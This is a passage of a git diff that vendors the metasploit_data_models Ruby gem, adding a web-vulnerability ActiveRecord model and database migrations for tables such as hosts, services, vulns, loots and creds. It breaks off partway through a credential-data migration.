a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_page.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_page.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_page.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_page.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_site.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_site.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_site.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_site.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb new file mode 100755 index 0000000000..4577818842 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb @@ -0,0 +1,144 @@ +# A Web Vulnerability found during a web scan or web audit. +# +# If you need to modify Mdm::WebVuln you can use ActiveSupport.on_load(:mdm_web_vuln) in side an initializer so that +# your patches are reloaded on each request in development mode for your Rails application. +# +# @example extending Mdm::WebVuln +# # config/initializers/mdm_web_vuln.rb +# ActiveSupport.on_load(:mdm_web_vuln) do +# def confidence_percentage +# "#{confidence}%" +# end +# end +class Mdm::WebVuln < ActiveRecord::Base + # + # CONSTANTS + # + + # A percentage {#confidence} that the vulnerability is real and not a false positive. 0 is not allowed because there + # shouldn't be an {Mdm::WebVuln} record if there is 0% {#confidence} in the the finding. + CONFIDENCE_RANGE = 1 .. 100 + + # Allowed {#method methods}. + METHODS = [ + 'GET', + # XXX I don't know why PATH is a valid method when it's not an HTTP Method/Verb + 'PATH', + 'POST' + ] + + # {#risk Risk} is rated on a scale from 0 (least risky) to 5 (most risky). + RISK_RANGE = 0 .. 5 + + # + # Associations + # + + belongs_to :web_site, :class_name => 'Mdm::WebSite' + + # + # Attributes + # + + # @!attribute [rw] blame + # Who to blame for the vulnerability + # + # @return [String] + + # @!attribute [rw] category + # Category of this vulnerability. + # + # @return [String] + + # @!attribute [rw] confidence + # Percentage confidence scanner or auditor has that this vulnerability is not a false positive + # + # @return [Integer] 1% to 100% + + # @!attribute [rw] description + # Description of the vulnerability + # + # @return [String, nil] + + # @!attribute [rw] method + # HTTP Methods for request that found vulnerability. 'PATH' is also allowed even though it is not an HTTP Method. + # + # @return [String] + # @see METHODS + + # @!attribute [rw] name + # Name of the vulnerability + # + # @return [String] + + # @!attribute [rw] path + # Path portion of URL + # + # @return [String] + + # @!attribute [rw] payload + # Web audit payload that gets executed by the remote server. Used for code injection vulnerabilities. + # + # @return [String, nil] + + # @!attribute [rw] pname + # Name of parameter that demonstrates vulnerability + # + # @return [String] + + # @!attribute [rw] proof + # String that proves vulnerability, such as a code snippet, etc. + # + # @return [String] + + # @!attribute [rw] query + # The GET query. + # + # @return [String] + + # @!attribute [rw] request + # + # @return [String] + + # @!attribute [rw] risk + # {RISK_RANGE Risk} of leaving this vulnerability unpatched. + # + # @return [Integer] + + # + # Validations + # + + validates :category, :presence => true + validates :confidence, + :inclusion => { + :in => CONFIDENCE_RANGE + } + validates :method, + :inclusion => { + :in => METHODS + } + validates :name, :presence => true + validates :path, :presence => true + validates :params, :presence => true + validates :pname, :presence => true + validates :proof, :presence => true + validates :risk, + :inclusion => { + :in => RISK_RANGE + } + validates :web_site, :presence => true + + # + # Serializations + # + + # @!attribute [rw] params + # Parameters sent as part of request + # + # @return [Array>] Array of parameter key value pairs + serialize :params, MetasploitDataModels::Base64Serializer.new + + ActiveSupport.run_load_hooks(:mdm_web_vuln, self) +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_request.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_request.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_request.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_request.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_target.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_target.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_target.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/workspace.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/workspace.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/workspace.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/workspace.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/bin/mdm_console b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/bin/mdm_console similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/bin/mdm_console rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/bin/mdm_console diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/console_db.yml b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/console_db.yml similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/console_db.yml rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/console_db.yml diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb new file mode 100755 index 0000000000..efda742476 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb @@ -0,0 +1,79 @@ +class CreateTables < ActiveRecord::Migration + + def self.up + + create_table :hosts do |t| + t.timestamp :created + t.string :address, :limit => 16 # unique + t.string :address6 + t.string :mac + t.string :comm + t.string :name + t.string :state + t.string :info, :limit => 1024 + t.string :os_name + t.string :os_flavor + t.string :os_sp + t.string :os_lang + t.string :arch + end + + add_index :hosts, :address, :unique => true + + create_table :clients do |t| + t.integer :host_id + t.timestamp :created + t.string :ua_string, :limit => 1024, :null => false + t.string :ua_name, :limit => 64 + t.string :ua_ver, :limit => 32 + end + + create_table :services do |t| + t.integer :host_id + t.timestamp :created + t.integer :port, :null => false + t.string :proto, :limit => 16, :null => false + t.string :state + t.string :name + t.string :info, :limit => 1024 + end + + create_table :vulns do |t| + t.integer :host_id + t.integer :service_id + t.timestamp :created + t.string :name + t.text :data + end + + create_table :refs do |t| + t.integer :ref_id + t.timestamp :created + t.string :name, :limit => 512 + end + + create_table :vulns_refs, :id => false do |t| + t.integer :ref_id + t.integer :vuln_id + end + + create_table :notes do |t| + t.integer :host_id + t.timestamp :created + t.string :ntype, :limit => 512 + t.text :data + end + + end + + def self.down + drop_table :hosts + drop_table :clients + drop_table :services + drop_table :vulns + drop_table :refs + drop_table :vulns_refs + drop_table :notes + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb new file mode 100755 index 0000000000..e0d37098c2 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb @@ -0,0 +1,35 @@ +class AddWmapTables < ActiveRecord::Migration + def self.up + create_table :wmap_targets do |t| + t.string :host # vhost + t.string :address, :limit => 16 # unique + t.string :address6 + t.integer :port + t.integer :ssl + t.integer :selected + end + + create_table :wmap_requests do |t| + t.string :host # vhost + t.string :address, :limit => 16 # unique + t.string :address6 + t.integer :port + t.integer :ssl + t.string :meth, :limit => 32 + t.text :path + t.text :headers + t.text :query + t.text :body + t.string :respcode, :limit => 16 + t.text :resphead + t.text :response + t.timestamp :created + end + end + + def self.down + drop_table :wmap_targets + drop_table :wmap_requests + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb new file mode 100755 index 0000000000..9afe792ef5 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb @@ -0,0 +1,36 @@ +class AddWorkspaces < ActiveRecord::Migration + + def self.up + create_table :workspaces do |t| + t.string :name + t.timestamps + end + + change_table :hosts do |t| + t.integer :workspace_id, :required => true + end + + remove_index :hosts, :column => :address + + # + # This was broken after 018_add_workspace_user_info was introduced + # because of the new boundary column. For some reason, the + # find_or_create_by_name that .default eventually calls here tries to + # create a record with the boundary field that doesn't exist yet. + # See #1724 + # + #w = Msf::DBManager::Workspace.default + #Msf::DBManager::Host.update_all ["workspace_id = ?", w.id] + end + + def self.down + drop_table :workspaces + + change_table :hosts do |t| + t.remove :workspace_id + end + + add_index :hosts, :address, :unique => true + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb new file mode 100755 index 0000000000..3aedba8e20 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb @@ -0,0 +1,20 @@ +class MoveNotes < ActiveRecord::Migration + def self.up + # Remove the host requirement. We'll add the column back in below. + remove_column :notes, :host_id + change_table :notes do |t| + t.integer :workspace_id, :null => false, :default => 1 + t.integer :service_id + t.integer :host_id + end + end + + def self.down + remove_column :notes, :workspace_id + remove_column :notes, :service_id + change_table :notes do |t| + t.integer :host_id, :null => false + end + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb new file mode 100755 index 0000000000..a89d75281e --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb @@ -0,0 +1,16 @@ +class AddEventsTable < ActiveRecord::Migration + def self.up + create_table :events do |t| + t.integer :workspace_id + t.integer :host_id + t.timestamp :created_at + t.string :user + t.string :name + t.string :info + end + end + def self.down + drop_table :events + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb new file mode 100755 index 0000000000..bd34021e11 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb @@ -0,0 +1,58 @@ +class ExpandInfo < ActiveRecord::Migration + def self.up + remove_column :events, :info + change_table :events do |t| + t.string :info, :limit => 4096 + end + + remove_column :notes, :data + change_table :notes do |t| + t.string :data, :limit => 4096 + end + + remove_column :vulns, :data + change_table :vulns do |t| + t.string :data, :limit => 4096 + end + + remove_column :hosts, :info + change_table :hosts do |t| + t.string :info, :limit => 4096 + end + + remove_column :services, :info + change_table :services do |t| + t.string :info, :limit => 4096 + end + end + + def self.down + + remove_column :events, :info + change_table :events do |t| + t.string :info + end + + remove_column :notes, :data + change_table :notes do |t| + t.string :data, :limit => 1024 + end + + remove_column :hosts, :info + change_table :hosts do |t| + t.string :info, :limit => 1024 + end + + remove_column :vulns, :data + change_table :hosts do |t| + t.string :data, :limit => 1024 + end + + remove_column :services, :info + change_table :services do |t| + t.string :info, :limit => 1024 + end + + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb new file mode 100755 index 0000000000..446a83aa29 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb @@ -0,0 +1,26 @@ + +# Adds 'created_at' and 'updated_at' columns to every primary table. +# +class AddTimestamps < ActiveRecord::Migration + + @@TABLES_NEEDING_RENAME = [:clients, :hosts, :notes, :refs, :services, :vulns, :wmap_requests] + @@TABLES_NEEDING_CREATED_AT = [:wmap_targets] + @@TABLES_NEEDING_UPDATED_AT = [:clients, :events, :hosts, :notes, :refs, :services, :vulns, :wmap_requests, :wmap_targets] + + def self.up + @@TABLES_NEEDING_RENAME.each { |t| rename_column t, :created, :created_at } + + @@TABLES_NEEDING_CREATED_AT.each { |t| add_column t, :created_at, :datetime } + + @@TABLES_NEEDING_UPDATED_AT.each { |t| add_column t, :updated_at, :datetime } + end + + def self.down + @@TABLES_NEEDING_RENAME.each { |t| rename_column t, :created_at, :created } + + @@TABLES_NEEDING_CREATED_AT.each { |t| remove_column t, :created_at } + + @@TABLES_NEEDING_UPDATED_AT.each { |t| remove_column t, :updated_at } + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb new file mode 100755 index 0000000000..32786f8cfb --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb @@ -0,0 +1,20 @@ +class AddLoots < ActiveRecord::Migration + + def self.up + create_table :loots do |t| + t.integer :workspace_id, :null => false, :default => 1 + t.integer :host_id + t.integer :service_id + t.string :ltype, :limit => 512 + t.string :path, :limit => 1024 + t.text :data + t.timestamps + end + end + + def self.down + drop_table :loots + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb new file mode 100755 index 0000000000..4cc32cc6e4 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb @@ -0,0 +1,16 @@ +class CreateUsers < ActiveRecord::Migration + def self.up + create_table :users do |t| + t.string :username + t.string :crypted_password + t.string :password_salt + t.string :persistence_token + + t.timestamps + end + end + + def self.down + drop_table :users + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb new file mode 100755 index 0000000000..0aad1366fb --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb @@ -0,0 +1,10 @@ +class AddLootsCtype < ActiveRecord::Migration + def self.up + add_column :loots, :content_type, :string + end + + def self.down + remove_column :loots, :content_type + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb new file mode 100755 index 0000000000..f99dd68d32 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb @@ -0,0 +1,16 @@ +class AddAlertFields < ActiveRecord::Migration + def self.up + add_column :notes, :critical, :boolean + add_column :notes, :seen, :boolean + add_column :events, :critical, :boolean + add_column :events, :seen, :boolean + end + + def self.down + remove_column :notes, :critical + remove_column :notes, :seen + remove_column :events, :critical + remove_column :events, :seen + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb new file mode 100755 index 0000000000..2f16e8b70d --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb @@ -0,0 +1,19 @@ +class AddReports < ActiveRecord::Migration + + def self.up + create_table :reports do |t| + t.integer :workspace_id, :null => false, :default => 1 + t.string :created_by + t.string :rtype + t.string :path, :limit => 1024 + t.text :options + t.timestamps + end + end + + def self.down + drop_table :reports + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb new file mode 100755 index 0000000000..39004c821e --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb @@ -0,0 +1,24 @@ +class AddTasks < ActiveRecord::Migration + + def self.up + create_table :tasks do |t| + t.integer :workspace_id, :null => false, :default => 1 + t.string :created_by + t.string :module + t.datetime :completed_at + t.string :path, :limit => 1024 + t.string :info + t.string :description + t.integer :progress + t.text :options + t.text :error + t.timestamps + end + end + + def self.down + drop_table :tasks + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb new file mode 100755 index 0000000000..bf01c7afb8 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb @@ -0,0 +1,10 @@ +class AddTasksResult < ActiveRecord::Migration + def self.up + add_column :tasks, :result, :text + end + + def self.down + remove_column :tasks, :result + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb new file mode 100755 index 0000000000..616d8c96be --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb @@ -0,0 +1,12 @@ +class AddLootsFields < ActiveRecord::Migration + def self.up + add_column :loots, :name, :text + add_column :loots, :info, :text + end + + def self.down + remove_column :loots, :name + remove_column :loots, :info + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb new file mode 100755 index 0000000000..7934a0f423 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb @@ -0,0 +1,16 @@ +class RenameUser < ActiveRecord::Migration + def self.up + remove_column :events, :user + change_table :events do |t| + t.string :username + end + end + + def self.down + remove_column :events, :username + change_table :events do |t| + t.string :user + end + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb new file mode 100755 index 0000000000..1e2827801e --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb @@ -0,0 +1,10 @@ +class AddHostPurpose < ActiveRecord::Migration + def self.up + add_column :hosts, :purpose, :text + end + + def self.down + remove_column :hosts, :purpose + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb new file mode 100755 index 0000000000..cee6fd8d3b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb @@ -0,0 +1,58 @@ +class ExpandInfo2 < ActiveRecord::Migration + def self.up + remove_column :events, :info + change_table :events do |t| + t.string :info, :limit => 65536 + end + + remove_column :notes, :data + change_table :notes do |t| + t.string :data, :limit => 65536 + end + + remove_column :vulns, :data + change_table :vulns do |t| + t.string :data, :limit => 65536 + end + + remove_column :hosts, :info + change_table :hosts do |t| + t.string :info, :limit => 65536 + end + + remove_column :services, :info + change_table :services do |t| + t.string :info, :limit => 65536 + end + end + + def self.down + + remove_column :events, :info + change_table :events do |t| + t.string :info + end + + remove_column :notes, :data + change_table :notes do |t| + t.string :data, :limit => 4096 + end + + remove_column :hosts, :info + change_table :hosts do |t| + t.string :info, :limit => 4096 + end + + remove_column :vulns, :data + change_table :vulns do |t| + t.string :data, :limit => 4096 + end + + remove_column :services, :info + change_table :services do |t| + t.string :info, :limit => 4096 + end + + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb new file mode 100755 index 0000000000..fb5e101fc3 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb @@ -0,0 +1,29 @@ +class AddWorkspaceUserInfo < ActiveRecord::Migration + def self.up + change_table :workspaces do |t| + t.string :boundary, :limit => 4096 + end + + change_table :users do |t| + t.string :fullname + t.string :email + t.string :phone + t.string :company + end + end + + def self.down + change_table :workspaces do |t| + t.remove :boundary + end + + change_table :users do |t| + t.remove :fullname + t.remove :email + t.remove :phone + t.remove :company + end + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb new file mode 100755 index 0000000000..0dc31f0c61 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb @@ -0,0 +1,23 @@ +class AddWorkspaceDesc < ActiveRecord::Migration + def self.up + change_table :workspaces do |t| + t.string :description, :limit => 4096 + end + + change_table :hosts do |t| + t.string :comments, :limit => 4096 + end + end + + def self.down + change_table :workspaces do |t| + t.remove :description + end + + change_table :hosts do |t| + t.remove :comments + end + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb new file mode 100755 index 0000000000..40b472701c --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb @@ -0,0 +1,11 @@ +class AddUserPreferences < ActiveRecord::Migration + def self.up + add_column :users, :prefs, :string, :limit => 524288 + end + + def self.down + remove_column :users, :prefs + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb new file mode 100755 index 0000000000..bb9a2bccd6 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb @@ -0,0 +1,18 @@ +class StandardizeInfoAndData < ActiveRecord::Migration + def self.up + # Remove the host requirement. We'll add the column back in below. + remove_column :vulns, :data + change_table :vulns do |t| + t.string :info, :limit => 65536 + end + end + + def self.down + remove_column :vulns, :info + change_table :notes do |t| + t.string :data, :limit => 65536 + + end + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb new file mode 100755 index 0000000000..fec9698c06 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb @@ -0,0 +1,10 @@ +class EnlargeEventInfo < ActiveRecord::Migration + def self.up + change_column :events, :info, :text + end + + def self.down + change_column :events, :info, :string, :limit => 65535 + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb new file mode 100755 index 0000000000..7ec5716e82 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb @@ -0,0 +1,10 @@ +class AddReportDownloadedAt < ActiveRecord::Migration + def self.up + add_column :reports, :downloaded_at, :timestamp + end + + def self.down + remove_column :reports, :downloaded_at + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb new file mode 100755 index 0000000000..14f0a96222 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb @@ -0,0 +1,12 @@ +class ConvertServiceInfoToText < ActiveRecord::Migration + + def self.up + change_column :services, :info, :text + end + + def self.down + change_column :services, :info, :string, :limit => 65536 + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb new file mode 100755 index 0000000000..d077dbd633 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb @@ -0,0 +1,19 @@ +class AddUserAdmin < ActiveRecord::Migration + + # Add user admin flag and project member list. + def self.up + add_column :users, :admin, :boolean, :default => true + + create_table :project_members, :id => false do |t| + t.integer :workspace_id, :null => false + t.integer :user_id, :null => false + end + end + + def self.down + remove_column :users, :admin + + drop_table :project_members + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb new file mode 100755 index 0000000000..381ec8373a --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb @@ -0,0 +1,19 @@ +class AddCredsTable < ActiveRecord::Migration + def self.up + create_table :creds do |t| + t.integer :service_id, :null => false + t.timestamps + t.string :user, :limit => 2048 + t.string :pass, :limit => 4096 + t.boolean :active, :default => true + t.string :proof, :limit => 4096 + t.string :ptype, :limit => 16 + t.integer :source_id + t.string :source_type + end + end + def self.down + drop_table :creds + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb new file mode 100755 index 0000000000..d752c270f4 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb @@ -0,0 +1,154 @@ +class MigrateCredData < ActiveRecord::Migration + + def self.up + begin # Wrap the whole thing in a giant rescue. + skipped_notes = [] + new_creds = [] + Mdm::Note.find(:all).each do |note| + next unless note.ntype[/^auth\.(.*)/] + service_name = $1 + if !service_name + skipped_notes << note + next + end + if note.host and note.host.respond_to?(:address) + if note.service + svc_id = note.service.id + else + candidate_services = [] + note.host.services.each do |service| + if service.name == service_name + candidate_services << service + end + end + # Use the default port, or the first port that matches the protocol name. + default_port = case service_name.downcase + when 'ftp'; 21 + when /^smb/; 445 + when /^imap/; 143 + when 'telnet'; 23 + when 'pop3'; 110 + when 'http','domino','axis','wordpress','tomcat'; 80 + when 'tns'; 1521 + when 'snmp'; 161 + when 'mssql'; 1433 + when 'ssh'; 22 + when 'https'; 443 + when 'mysql'; 3306 + when 'db2'; 50000 + when 'postgres'; 5432 + else nil + end + if !default_port + skipped_notes << note + next + end + if candidate_services.size == 1 + svc_id = candidate_services.first.id + elsif candidate_services.empty? + Mdm::Service.new do |svc| + svc.host_id = note.host.id + svc.port = default_port + svc.proto = 'tcp' + svc.state = 'open' + svc.name = service_name.downcase + svc.save! + svc_id = svc.id + end + elsif candidate_services.size > 1 + svc_ports = candidate_services.map{|s| s.port} + if svc_ports.index(default_port) + svc_id = candidate_services[svc_ports.index(default_port)].id + else + svc_id = candidate_services.first.id + end + end + end + else + skipped_notes << note + next + end + if note.data[:hash] + ptype = 'smb_hash' + pass = note.data[:hash] + elsif note.data[:ssh_key] + ptype = 